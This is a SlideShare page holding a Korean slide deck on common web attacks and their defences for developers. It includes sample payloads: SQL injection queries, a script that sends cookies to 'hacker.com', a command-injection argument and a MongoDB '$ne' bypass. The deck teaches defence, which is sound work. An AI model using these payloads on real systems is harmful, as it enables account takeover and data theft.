Advertisement
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격
웹 개발을 위해 꼭 알아야하는 보안 공격

Check these out next

Cross site scripting
Cross site scripting
ashutosh rai
Security vulnerabilities - 2018
Security vulnerabilities - 2018
Marius Vorster
Cross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran
Cross site scripting
Cross site scripting
kinish kumar
Modern Web Application Defense
Modern Web Application Defense
Frank Kim
XSS- an application security vulnerability
XSS- an application security vulnerability
Soumyasanto Sen
Secure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community
Xss (cross site scripting)
Xss (cross site scripting)
vinayh.vaghamshi _
1 of 46

웹 개발을 위해 꼭 알아야하는 보안 공격

Feb. 28, 2021
Download to read offline
Technology

통신보안

선협 이
Developer at 트러스트어스
Advertisement
Advertisement
Advertisement

Recommended

Xss what the heck-!Xss what the heck-!
Xss what the heck-!VodqaBLR660 views25 slides
An Overview of Common Vulnerabilities in WordpressAn Overview of Common Vulnerabilities in Wordpress
An Overview of Common Vulnerabilities in WordpressAnalytive1.6K views25 slides
XSS Injection VulnerabilitiesXSS Injection Vulnerabilities
XSS Injection VulnerabilitiesMindfire Solutions3.5K views20 slides
Xss presoXss preso
Xss presofoobarlink4408 views5 slides
Web content security policiesWeb content security policies
Web content security policiesDhanu Gupta58 views7 slides
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape3.7K views23 slides

More Related Content

Slideshows for you(20)

Cross site scriptingCross site scripting
Cross site scripting
ashutosh rai583 views
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
Marius Vorster219 views
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran17.5K views
Cross site scriptingCross site scripting
Cross site scripting
kinish kumar30K views
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
Frank Kim1.1K views
XSS- an application security vulnerabilityXSS- an application security vulnerability
XSS- an application security vulnerability
Soumyasanto Sen1.2K views
Secure coding | XSS Attacks on current Web ApplicationsSecure coding | XSS Attacks on current Web Applications
Secure coding | XSS Attacks on current Web Applications
n|u - The Open Security Community4.7K views
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
vinayh.vaghamshi _1.3K views
XSSXSS
XSS
Hrishikesh Mishra4.7K views
Security Basics For Developers KnowledgeSecurity Basics For Developers Knowledge
Security Basics For Developers Knowledge
Siva Sankar64 views
Java EE 6 Security in practice with GlassFishJava EE 6 Security in practice with GlassFish
Java EE 6 Security in practice with GlassFish
Markus Eisele2.5K views
XssXss
Xss
Rajendra Dangwal919 views
Identifying Cross Site Scripting Vulnerabilities in Web ApplicationsIdentifying Cross Site Scripting Vulnerabilities in Web Applications
Identifying Cross Site Scripting Vulnerabilities in Web Applications
Porfirio Tramontana18.4K views
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
Michael Hendrickx3.8K views
Story of http headersStory of http headers
Story of http headers
Vandana Verma186 views
Web vulnerabilitiesWeb vulnerabilities
Web vulnerabilities
Oleksandr Kovalchuk561 views
Security VulnerabilitiesSecurity Vulnerabilities
Security Vulnerabilities
Marius Vorster1K views
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
Daniel Tumser4.8K views
Tsc summit #2 - HTTP Header SecurityTsc summit #2 - HTTP Header Security
Tsc summit #2 - HTTP Header Security
Mikal Villa937 views
Protecting Java EE Web Apps with Secure HTTP HeadersProtecting Java EE Web Apps with Secure HTTP Headers
Protecting Java EE Web Apps with Secure HTTP Headers
Frank Kim13.7K views

Similar to 웹 개발을 위해 꼭 알아야하는 보안 공격(20)

Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates6K views
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar632 views
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB9.3K views
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar1.3K views
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
nooralmousa484 views
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath2.1K views
Web application security part 01Web application security part 01
Web application security part 01
G Prachi226 views
Secure webbrowsing 1Secure webbrowsing 1
Secure webbrowsing 1
UT, San Antonio553 views
CodeinjectionCodeinjection
Codeinjection
Nitish Kumar998 views
Xss talk, attack and defenseXss talk, attack and defense
Xss talk, attack and defense
Prakashchand Suthar21.6K views
Cross site scripting Cross site scripting
Cross site scripting
Bilal Mazhar MS(IS)Cyber Security II Privacy Professional230 views
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
Shubham Gupta285 views
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
OWASP Khartoum3.7K views
aa
a
Sandeep Kumar196 views
Open source securityOpen source security
Open source security
lrigknat1.6K views
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar2.7K views
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
Yassine Aboukir3.1K views
Devouring Security Insufficient data validation risks Cross Site ScriptingDevouring Security Insufficient data validation risks Cross Site Scripting
Devouring Security Insufficient data validation risks Cross Site Scripting
gmaran233.4K views
Web Application SecurityWeb Application Security
Web Application Security
n|u - The Open Security Community1.2K views
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry14.2K views
Advertisement

More from 선협 이(16)

MongoDB 이해하기MongoDB 이해하기
MongoDB 이해하기
선협 이2.9K views
Deep dive into Vue.jsDeep dive into Vue.js
Deep dive into Vue.js
선협 이2.4K views
오픈소스를 여행하는 히치하이커를 위한 안내서 - 자막오픈소스를 여행하는 히치하이커를 위한 안내서 - 자막
오픈소스를 여행하는 히치하이커를 위한 안내서 - 자막
선협 이848 views
Metal 기반 특별한 UI/UX 제공하기 - Let'Swift 2017Metal 기반 특별한 UI/UX 제공하기 - Let'Swift 2017
Metal 기반 특별한 UI/UX 제공하기 - Let'Swift 2017
선협 이1.3K views
Vue.js와 Reactive Programming 자막 :: Vuetiful Korea 2ndVue.js와 Reactive Programming 자막 :: Vuetiful Korea 2nd
Vue.js와 Reactive Programming 자막 :: Vuetiful Korea 2nd
선협 이6.1K views
Reactive Programming With SwiftReactive Programming With Swift
Reactive Programming With Swift
선협 이5.5K views
Tour of Vue.jsTour of Vue.js
Tour of Vue.js
선협 이18K views
Functional Reactive Programming With RxSwiftFunctional Reactive Programming With RxSwift
Functional Reactive Programming With RxSwift
선협 이28.6K views
파크히어 Realm 사용 사례파크히어 Realm 사용 사례
파크히어 Realm 사용 사례
선협 이3.7K views
왜 Swift를 해야할까요?왜 Swift를 해야할까요?
왜 Swift를 해야할까요?
선협 이4.6K views
C++ 코드 품질 관리 비법C++ 코드 품질 관리 비법
C++ 코드 품질 관리 비법
선협 이27K views
C++과 Lua script연동C++과 Lua script연동
C++과 Lua script연동
선협 이21.6K views
C++11C++11
C++11
선협 이4.8K views
MSBuild + Git + JenkinsMSBuild + Git + Jenkins
MSBuild + Git + Jenkins
선협 이15.3K views
Post Effect 테스트Post Effect 테스트
Post Effect 테스트
선협 이3.1K views
C++과 TDDC++과 TDD
C++과 TDD
선협 이7.5K views

Recently uploaded(20)

Python Control Structures.pptxPython Control Structures.pptx
Python Control Structures.pptx
M Vishnuvardhan Reddy0 views
Python Strings.pptxPython Strings.pptx
Python Strings.pptx
M Vishnuvardhan Reddy0 views
GIGALIGHT-Optical Transceiver SiPh MZ Quad Operating Point LockingGIGALIGHT-Optical Transceiver SiPh MZ Quad Operating Point Locking
GIGALIGHT-Optical Transceiver SiPh MZ Quad Operating Point Locking
Gigalight0 views
W-6-7-Ch-5-Tank Suspension system.pptxW-6-7-Ch-5-Tank Suspension system.pptx
W-6-7-Ch-5-Tank Suspension system.pptx
vishnoo70 views
Cloud Forensics ToolsCloud Forensics Tools
Cloud Forensics Tools
Christopher Doman0 views
us_blackbox_brochure_control-room.pdfus_blackbox_brochure_control-room.pdf
us_blackbox_brochure_control-room.pdf
OliviaJohn162 views
5G New Radio Architecture.pdf5G New Radio Architecture.pdf
5G New Radio Architecture.pdf
Karthick Rajagopal3 views
Accelerating Flow with Team Topologies & Friends @ Wroclaw Kanban, Lean & Cof...Accelerating Flow with Team Topologies & Friends @ Wroclaw Kanban, Lean & Cof...
Accelerating Flow with Team Topologies & Friends @ Wroclaw Kanban, Lean & Cof...
Manuel Pais0 views
Temporary Tattoo.pdfTemporary Tattoo.pdf
Temporary Tattoo.pdf
DevDeshpande23 views
HTML_Images.pptHTML_Images.ppt
HTML_Images.ppt
jaspreetkaur9080492 views
The Benefits of Adopting the Lamp Tech Stack: A Comprehensive Guide:The Benefits of Adopting the Lamp Tech Stack: A Comprehensive Guide:
The Benefits of Adopting the Lamp Tech Stack: A Comprehensive Guide:
Brain Inventory0 views
UNCOVERING MYTHS ABOUT CLOUD COMPUTING - IS IT.pptxUNCOVERING MYTHS ABOUT CLOUD COMPUTING - IS IT.pptx
UNCOVERING MYTHS ABOUT CLOUD COMPUTING - IS IT.pptx
OsazeeOboh0 views
trackingSpoofedIp.pptxtrackingSpoofedIp.pptx
trackingSpoofedIp.pptx
BincySam20 views
Tips and tricks for data science projects with Python Tips and tricks for data science projects with Python
Tips and tricks for data science projects with Python
Jose Manuel Ortega Candel0 views
W-2-Ch-2-Intro to Power plants.pptW-2-Ch-2-Intro to Power plants.ppt
W-2-Ch-2-Intro to Power plants.ppt
vishnoo70 views
Python Sets_Dictionary.pptxPython Sets_Dictionary.pptx
Python Sets_Dictionary.pptx
M Vishnuvardhan Reddy0 views
Python para equipos de ciberseguridad(pycones)Python para equipos de ciberseguridad(pycones)
Python para equipos de ciberseguridad(pycones)
Jose Manuel Ortega Candel0 views
Open Data Center Interconnect Products and Solutions Brochure -GL.pdfOpen Data Center Interconnect Products and Solutions Brochure -GL.pdf
Open Data Center Interconnect Products and Solutions Brochure -GL.pdf
Gigalight3 views
H3C Corporate Brochure.pdfH3C Corporate Brochure.pdf
H3C Corporate Brochure.pdf
AbdulRehmanAbid62 views
Qualys APIQualys API
Qualys API
Giacomo Cocozziello0 views
Advertisement

웹 개발을 위해 꼭 알아야하는 보안 공격

  1. 웹 개발을 위해 꼭 알아야하는 보안 공격 2021. 02. 22 이선협
  2. 오늘의 목표 웹 보안에 대해 이해하고 기초 공격 기법과 해결 방법을 이해한다.
  3. 웹 보안 웹 사이트의 취약점을 공격하는 기술적 위협으로, 웹 페이지를 통하여 권한이 없는 시스템에 접근하거나 데이터 유출 및 파괴와 같은 행위를 말한다. https://ko.wikipedia.org/wiki/웹_해킹
  4. 한 순간의 실수로 서비스가 망할 수도 있다! 😨
  5. 너무 다양한 공격 기법… SQL Injection XSS CSRF Attack File Upload Attack Command Injection Buffer Overflow Dictionary Attack . . .
  6. 전부는 아니더라도 기초적인 것은 꼭 알아둬야한다
  7. 알아야하는 공격 기법 Start
  8. SQL Injection •서버에서 실행되는 SQL을 악의적으로 이용하는 공격 •기존 SQL에 악의적인 SQL을 삽입한다. •데이터 탈취, 삭제 등이 가능하다. •뚫리면 서비스 종료각
  9. SQL Injection - 사례
  10. SQL Injection - 사례
  11. SQL Injection - 방어 •SQL에서 특별한 의미를 가지는 문자를 이스케이프한다. ex) n, t, |, /, &, #, …... •준비된 선언을 사용한다. •요즘은 라이브러리, 프레임워크에서 아주 잘 막아준다.
  12. SQL Injection - 심화 •Error based SQL Injection •일부러 SQL 에러를 발생시켜 원하는 정보를 취득한다. •쿼리문 추측, DB명, 테이블명 등의 취득이 가능하다.
  13. SQL Injection - 심화 •Blind SQL Injection •Query 결과의 참/거짓을 보고 원하는 정보가 존재하는지 알 수 있다. (추론) •DB, Table 명을 알 수 있다. •SQLMap ex) SELECT * FROM users WHERE user_id = '1' and substring(database(),1,2)='us'#
  14. SQL Injection - 심화 •Union SQL Injection •Union 명령을 이용하여 정보를 취득한다. ex) SELECT * FROM users WHERE user_id = '1' or 1=1 UNION SELECT '',id,pw from users#
  15. XSS •Crose-Site Scripting •웹 페이지에 악성 스크립트를 삽입하는 공격 •사이트 이용자 정보를 탈취할 수 있다. •뚫리면 많은 것을 잃는다.
  16. XSS - 사례 <script>document.URL='http://hacker.com?'+document.cookie</script> 게시판 이용자가 글을 읽을 때 토큰 탈취!!!
  17. XSS - 방어 •HTML 필터링을 한 후 DB에 저장한다. ex) <, >, script, html, head, meta, …… •만약을 위해 프론트엔드에서도 필터링한다.
  18. XSS - 심화 •앞서 소개한 방식은 Stored XSS •Reflected XSS •DOM Based XSS
  19. XSS - 심화 •Reflected XSS •검색어 등을 보여주는 곳에 스크립트를 심는 공격 •URL을 사용자에게 누르게 만들면 공격 성공 https://papago.naver.com/?sk=ko&tk=en&st=<script>…</script>
  20. XSS - 심화 •DOM Based XSS •DOM에 악의적인 스크립트를 심는 공격 •브라우저가 해석하는 단계에서 발생되는 공격
  21. CSRF Attack •Cross-Site Request Forgery •공격자가 사용자를 이용하여 웹 사이트에 요청을 보내는 공격
  22. CSRF Attack - 사례 가짜 진짜 admin 1q2w3e4r 로그인 요청 성공/실패 성공했으면 저장
  23. CSRF Attack - 방어 •Referrer Check •허용한 도메인만 요청 허락하도록 설정 •CSRF Token •모든 요청에 토큰을 발급하여 서버에서 검증 •CAPTCHA •사람이 요청한 것이 맞는지 검증
  24. Command Injection •애플리케이션에서 사용되는 시스템 명령에 악의적인 명령어를 삽입하는 공격 (WebShell Attack) •서버 root 권한을 취득할 수 있다. •뚫리면 서비스 종료각
  25. Command Injection - 사례 Hacker text.txt; ifconfig system("cat ${var}") execute WebShell
  26. Command Injection - 방어 •가급적 시스템 함수는 사용 X •민감한 문자를 필터링 ex) |, &, ;, >, <
  27. File Upload Attack •악성 스크립트 파일을 업로드하는 공격 •업로드 후 파일 위치를 찾아 실행시키면 공격 성공 •뚫리면 서비스 종료각
  28. File Upload Attack - 사례 Upload 1 2 Command WebShell
  29. File Upload Attack - 방어 •확장자 / 파일 타입 검사 •업로드 파일을 난수화하여 저장 •특수 문자가 포함된 경우 업로드 금지 (Null byte Injection 방어)
  30. Javascript Injection •Client-Side에서 Javascript를 삽입시키는 공격 •크롬 console 등을 통해 조작 가능하다. •Client-Side에 민감한 데이터를 넣을 경우 탈취 가능
  31. Javascript Injection - 사례
  32. Javascript Injection - 방어 •Client-Side엔 민감한 정보를 절대 넣지 않는다. •데이터 유효성 검사가 필요한 경우 서버와 통신한다. (Client에서 검사하면 안된다)
  33. DDoS •Distributed Denial of Service •서버에 비정상적으로 많은 트래픽을 보내는 공격 •서비스가 마비되고 많은 비용이 소모된다.
  34. DDoS - 사례 Zombie PC Traffic
  35. DDoS - 방어 •제일 단순한데 제일 막기 어렵다. •확장 가능한 서비스 구조 설계 •IP 필터링 •솔루션 구매... …
  36. Dictionary Attack •미리 사전에 등록해놓은 문자열을 암호로 대입하는 공격 •Brute Force의 일종
  37. Dictionary Attack - 사례 admin apple banana cyber . . . 1q2w3e4r
  38. Dictionary Attack - 방어 •의미가 있는 문자열은 암호로 등록 못하도록 설정 •Account Lockout Policy •2-factor 인증
  39. Rainbow Table •해시 함수를 이용한 평문을 모두 저장시켜 놓은 표 •계정 탈취 후 암호 원문을 알아내기 위해 사용
  40. Rainbow Table - 방어 •Salt 사용 •Key Stretching •PBKDF2, Bcrypt 등의 암호화 알고리즘 사용
  41. MongoDB Injection •SQL Injection처럼 악의적인 값을 넣어 DB를 조작하는 공격 •뚫리면 서비스 종료각
  42. MongoDB Injection - 사례 db.collection.find({ "email": "kciter@cobalt.run", "password": password }) db.collection.find({ "email": "kciter@cobalt.run", "password": { "$ne": "-" }) password = { "$ne": "-" }
  43. MongoDB Injection - 방어 •영향을 줄 수 있는 문자를 필터링한다. ex) $, {, }, [, ], (, ), ...
  44. Buffer Overflow •Buffer Overflow를 통해 다른 메모리에 접근하는 공격 •다른 메모리에 접근 및 제어가 가능하기 때문에 치명적 •시스템 해킹 기법이기도 하다. •뚫리면 서비스 종료각
Advertisement